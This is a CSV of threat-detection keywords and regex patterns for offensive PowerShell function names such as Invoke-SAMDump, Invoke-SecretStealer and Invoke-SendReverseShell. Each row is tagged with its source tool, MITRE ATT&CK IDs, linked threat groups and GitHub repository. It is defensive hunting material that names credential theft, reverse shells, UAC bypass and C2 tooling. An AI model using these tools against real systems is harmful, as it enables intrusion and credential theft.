"*Invoke-RunasCs.ps1*",".{0,1000}Invoke\-RunasCs\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49477" "*invoke-runaspayload*",".{0,1000}invoke\-runaspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49478" "*Invoke-RunAsSystem.ps1*",".{0,1000}Invoke\-RunAsSystem\.ps1.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","49479" "*Invoke-RunAsWithCert*",".{0,1000}Invoke\-RunAsWithCert.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","49480" "*Invoke-RunningProcessCheck*",".{0,1000}Invoke\-RunningProcessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49481" "*Invoke-S3ssionGoph3r*",".{0,1000}Invoke\-S3ssionGoph3r.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49482" "*Invoke-s4u2self*",".{0,1000}Invoke\-s4u2self.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","1","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49483" "*Invoke-S4U-persistence.ps1*",".{0,1000}Invoke\-S4U\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","49484" 
"*Invoke-SafetyKatz*",".{0,1000}Invoke\-SafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49485" "*Invoke-SamBackupFilesCheck*",".{0,1000}Invoke\-SamBackupFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49486" "*Invoke-SAMDump *",".{0,1000}Invoke\-SAMDump\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49487" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49488" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration 
tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49489" "*Invoke-SauronEye*",".{0,1000}Invoke\-SauronEye.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49490" "*Invoke-SauronEye.ps1*",".{0,1000}Invoke\-SauronEye\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - 
TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49491" "*Invoke-SccmCacheFolderCheck*",".{0,1000}Invoke\-SccmCacheFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49492" "*Invoke-SccmCacheFolderVulnCheck*",".{0,1000}Invoke\-SccmCacheFolderVulnCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49493" "*Invoke-ScheduledTasksCheck*",".{0,1000}Invoke\-ScheduledTasksCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49494" "*Invoke-ScheduledTasksImagePermissionsCheck*",".{0,1000}Invoke\-ScheduledTasksImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49495" "*Invoke-ScheduledTasksUnquotedPathCheck*",".{0,1000}Invoke\-ScheduledTasksUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49496" "*Invoke-Schtasks*",".{0,1000}Invoke\-Schtasks.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49497" "*Invoke-SCMPermissionsCheck*",".{0,1000}Invoke\-SCMPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49498" "*Invoke-SCOMDecrypt*",".{0,1000}Invoke\-SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","49499" "*Invoke-ScriptSentry*",".{0,1000}Invoke\-ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","49500" "*Invoke-SCShell*",".{0,1000}Invoke\-SCShell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49501" "*Invoke-SDCLTBypass*",".{0,1000}Invoke\-SDCLTBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49502" "*Invoke-SDCLTBypass.ps1*",".{0,1000}Invoke\-SDCLTBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - 
T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49503" "*Invoke-SDPropagator*",".{0,1000}Invoke\-SDPropagator.{0,1000}","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","N/A","2","128","26","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z","49504" "*Invoke-SearchGAL*",".{0,1000}Invoke\-SearchGAL.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49505" "*Invoke-SearchMailbox*",".{0,1000}Invoke\-SearchMailbox.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Has the ability to do deep searches across a user's mailbox and can export
messages","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49506" "*Invoke-SearchSharePointAndOneDrive*",".{0,1000}Invoke\-SearchSharePointAndOneDrive.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Search across all SharePoint sites and OneDrive drives visible to the user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49507" "*Invoke-SearchTeams -Tokens *",".{0,1000}Invoke\-SearchTeams\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49508" "*Invoke-SearchUserAttributes*Search for terms across all user attributes in a directory*",".{0,1000}Invoke\-SearchUserAttributes.{0,1000}Search\sfor\sterms\sacross\sall\suser\sattributes\sin\sa\sdirectory.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49509" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49510" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49511" "*Invoke-SecretDecrypt*",".{0,1000}Invoke\-SecretDecrypt.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","49512" "*Invoke-SecretsDump.ps1*",".{0,1000}Invoke\-SecretsDump\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49513" "*Invoke-SecretStealer*",".{0,1000}Invoke\-SecretStealer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","49514" "*Invoke-SecurityGroupCloner -Tokens *",".{0,1000}Invoke\-SecurityGroupCloner\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49515" "*Invoke-SecurityGroupCloner*",".{0,1000}Invoke\-SecurityGroupCloner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Clones a security group while using an identical name and member list but can inject another user as well","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49516" "*Invoke-SendMail -Targets*",".{0,1000}Invoke\-SendMail\s\-Targets.{0,1000}","offensive_tool_keyword","DBC2","DBC2 
(DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49517" "*Invoke-SendReverseShell*",".{0,1000}Invoke\-SendReverseShell.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49518" "*Invoke-SendToPasteBin*",".{0,1000}Invoke\-SendToPasteBin.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49519" "*Invoke-SensitiveHiveFileAccessCheck*",".{0,1000}Invoke\-SensitiveHiveFileAccessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
